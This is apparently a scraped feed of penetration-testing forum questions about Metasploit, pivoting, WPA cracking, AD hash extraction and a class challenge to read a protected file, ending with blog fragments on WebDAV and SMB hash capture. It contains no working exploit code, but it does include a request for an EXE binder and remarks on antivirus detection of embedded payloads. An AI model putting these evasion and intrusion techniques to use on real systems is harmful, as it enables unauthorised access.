So a professor of my Computer Security course, together with the campus IT director, have offered my class a challenge. They've placed a file (aptly named secret.txt) with a secret word/phrase/something in a protected folder, and are offering extra credit if we can figure out what that word is. We aren't allowed to destroy anything or inhibit use of the server to other students, but past that anything (sans physical coercion and blackmail) goes.
The server is running SunOS 5.9. The folder, and all files within it that I know of, have 700 permissions, and both accounts I have access to are in the students group, whereas he's in the faculty group. We can print the shadowed /etc/passwd, but permission is denied to read or copy /etc/shadow.
We'll get credit whether we get caught or not, but ideas that get the secret word without alerting anybody are preferable. I'm familiar with unix/linux, but not so much with penetrating it. I come to you asking for advice and guidance in things to learn about that would aid me in this endeavor.
Thank you
-
-
11:54
»
remote-exploit & backtrack
i know this might sound pretty noobish to some of you professionals, but what is the best way to determine what exploits will work on a victim machine. i know nmap is good for finding ports but what is the method everyone uses to know what exploit to choose that will comply. i am running boxs with win xp sp2 and sp3 and my host with bt4 final.
-
6:21
»
remote-exploit & backtrack
HI all;
i need help. i am searching a tool that could list all subdomains for a target domain :confused: ex : .edu.* , i would like to collect all subdomains of this target for example i tried goorecon but it result only 60 subdomains for my target :rolleyes: at the other hand when searching manually through google i found 200 subdomains
-
-
21:26
»
remote-exploit & backtrack
Hi, I am doing some Pentesting at school with full permission of the target and the school. I am trying to either exploit it or use social engineering. I would prefer to try and exploit it because that would be more immediate. I looked in the exploit database but did not find an exploit. If either you can point me to an exploit in the database or some other form of exploit I would appreciate it. MITM is an option but I would prefer not to do that as I do not want to try it on a production network even though I am allowed to.
-
11:17
»
remote-exploit & backtrack
hey guys,
so ive been working with metasploit on normal internal networks at home. Everything works great there. Now ive wanted to go to the next level and see how everything works on a domain. So ive set up a small server at home and a domain to log into. I have a client log onto the server. I connect to this client using meterpreter. etc etc. So till now everything was jolly. Now when i try to take over the root account or system of the computer that ive exploited i cant migrate to the system. I think it has something to do with the fact the im logged onto the server and not the local account. Any idea on how to compromise the local account? Or even better the server that the computer is logged into?
I kno its a lot to read through, but i appreciate the help..
squib
-
-
4:52
»
remote-exploit & backtrack
hi guys,
I have tried to use windows/browser/ie_aurora.
My internet connection is by a router, so my public IP address is different from the local one.
So when I use ie_aurora it works fine if I use 192.168.1.104 (local intranet address) but if I use my public address like 82.34.XXX.XXX as SRVHOST and LHOST:
msf exploit(ie_aurora) >
[-] Handler failed to bind to 82.34.XXX.XXX:4444
[-] Handler failed to bind to 0.0.0.0:4444
[-] Exploit failed: The address is already in use (0.0.0.0:4444).[*] Server stopped.
do you know how I can start the server if I am under a router????
Thanks,
Mister|x
-
-
13:56
»
remote-exploit & backtrack
During a recent discussion with co-workers over lunch, the topic of offensive security came up. Preferring offensive security over anything else, I chimed in and explained the glorious difference study, and skill development methods between offensive and defensive security ideologies.
Offensive security and everything it encapsulates can be seen as a sport. There are techniques, tricks, methods, styles, different platforms, etc. all at your disposal to use to your liking. Youre taking your keyboard, and turning it into a controller that can potentially do as much damage as you allow yourself to learn. Offensive security can be practiced. You can even increase the speed in which you attack. The list goes on.
Defensive security is boring. Its preventive. Write your policies, set up your controls, audit, report. ZZZZZ. Is this what I got into security for? No. Hardly. Not even close in fact. Anyway
It came to mind that if offensive security can be considered a sport, why not train like an athlete. Yes, its good to know the general concepts, tools, and how to use them, but how is that really effective in todays fast paced cyber-terrorism world? If youre not trained to detect, react, and attack appropriately, youre bound to become useless. The combination of both knowledge and disciplined ability will be invaluable.
I would imagine that a training curriculum for offensive security could take the security skills you already have, and hone them into militant abilities and at the same time, teach new methods. Not only would there be a program to follow for disciplined learning, but common offensive security tasks as well as attacks would become so ingrained into an individual, they would never have to stop, hesitate, or look up a procedure that was merely foggy or forgotten.
Does anyone have such a program or training curriculum?
How do you keep your skills sharp?
Would anyone be interested in developing such a curriculum with me?
-
-
11:17
»
remote-exploit & backtrack
hi,
is it possible to use the autopwn function to check a host if it would be possible to be exploited without exploiting it?
or is there any other way to check a host against all exploits from metasploit without compromising the host?
-
-
20:25
»
remote-exploit & backtrack
Hey guys, did a search but am looking for a more specific answer.
Right, im doing a little pentest on my AP which uses WPA-PSK.
I used my netbook to run BT4 then I successfully de-auth my targeted workstation (my desktop using wifi) and captured the 4-way handshake into a capture file.
I then used the default aircrack word list (password.lst) to try and crack the handshake.
I then get KEY FOUND [ penelope]
I assume this means all it good and its been cracked, However I know this is not the password as its set to "Chronicles2"
Yet doing another capture file from my same bssid and aircrack still tells me this is the key.
why does aircrack tell me this is the key?
thanks.
I do have permission to crack the WPA passcode as I own the network, pay the bill and set up the AP. Just incase anyone asks =]
-
-
21:10
»
remote-exploit & backtrack
Hello all,
My management has approved an audit of AD accounts looking for weak passwords
Since I have the server and backups I would have access to NTDS.DIT file, is there away to extract password hashes directly from it? I'm trying to avoid running LC or fgdump on the Active Directory domain controller.
I've searched high and low and have not been able to find an answer.
-
-
18:56
»
remote-exploit & backtrack
I have a training lab setup and I am having trouble trying to double pivot. I have a firewall showing an FTP server thru, i have exploited the FTP server, scanned internally, found some hosts. Setup a pivot through the FTP server and exploited a host, this host has a second NIC and another host behind it. I have setup another route through the host but i cannot get any of my exploits to work against the second host.
Just wondering if anyone has done this before, or if it is even possible to double up pivots.
If needed I can give more details, IPs and such...
Thanks for any help
-
-
12:06
»
remote-exploit & backtrack
Suppose you wanted to fool OS fingerprinting tools such as xprobe, nmap, etc. in order to make the initial information gathering phase harder.
In BSD you can set net.inet.udp.blackhole or even better, use pf's traffic normalization options.
Even the Windows world has seen a few tools to make your win* box appear as running a different OS.
In Linux, on the other hand, we had IPpersonality (ippersonality.sourceforge.net), iplog (ojnk.sourceforge.net) and morph (synacklabs.net) but they're now quite old and only work with 2.4 kernels.
So I was wondering if any of you can suggest alternatives? pf for linux anyone? :rolleyes:
-
-
22:05
»
remote-exploit & backtrack
Good or bad news depending on who cares, but the meterpreter reverse_tcp payload embeded in an exe or shellcode within another exe is now detected:
Virustotal. MD5: c32f921f597c7f82f4b48a7604b6d860 Trojan Horse Trojan.Vilsel.omg Trojan:W32/Rozena.gen!A
also this was created with no encoders, although i dont think they would help.
-
-
14:00
»
remote-exploit & backtrack
As the title states - does anyone have recommendations on a good EXE-binder?
-
-
5:52
»
remote-exploit & backtrack
Hi all,
I know that we could setup web server using metsploit, But I cant access it over internet, its accessable inside LAN but not over the net.. Wondering why...
any help would be appreciated.
-
-
14:25
»
remote-exploit & backtrack
hi
I Hope this is the right place to ask this.
When I use Metasploit its work very good on my local network
but when i want to pentest out of my local it doesnt work:confused:
can some one tell me why?
-
9:56
»
remote-exploit & backtrack
First let me say, yes I know this isn't a nmap support forum and that if nobody here knows the answer to my question I will go ask on a nmap mailing list or something.
To the point. I'm wondering if anyone knows the scope of NMAP NSE scripts? Are they always associated with a port or are there host level NSEs as well. Think of this from the perspective of parsing NMAP XML output.
Personally I've only seen NSE output related to a port but that doesn't meant that there isn't a host level NSE output that I just haven't managed to trigger yet.
Edit: Yes I know I typo'd the subject line :(
-
-
12:04
»
remote-exploit & backtrack
I was recently asked a question about ODBC connections to a SQL server and the possibility of MITM or sniffing attacks. Can someone point me to something that discusses this? I've had a hard time finding much about it, hopefully someone here can dump some knowledge.
Thanks,
C
OSVDB Vulnerabilities
Bugtraq
Penetration Testing
The Exploitant
If you click on the twitter maps app, it loads recent geo-tagged tweets
Setting the payload spots
Our list of usernames
Timing options
Main trace.axd page
Viewing a request
Post request with creds
Linux you can use Afpfs-ng
Man I love mis-configured WebDAV, I have put a foot in many a network's ass with a writable WebDAV server. Like the browsable directories thing, its *usually* not writable, but it occurs often enough that you really have to make sure you check it each time you see it.
Once that is done, save and open the document, if all is well you'll see the SMB requests to the network share you specified and if you are running the smb capture module you should see some traffic. Screenshot below shows the goods...I do realize the LM hashes are missing from smb capture screenie (disabled on windows 7?) but i was too lazy to install office on a VM just for the screenshot.
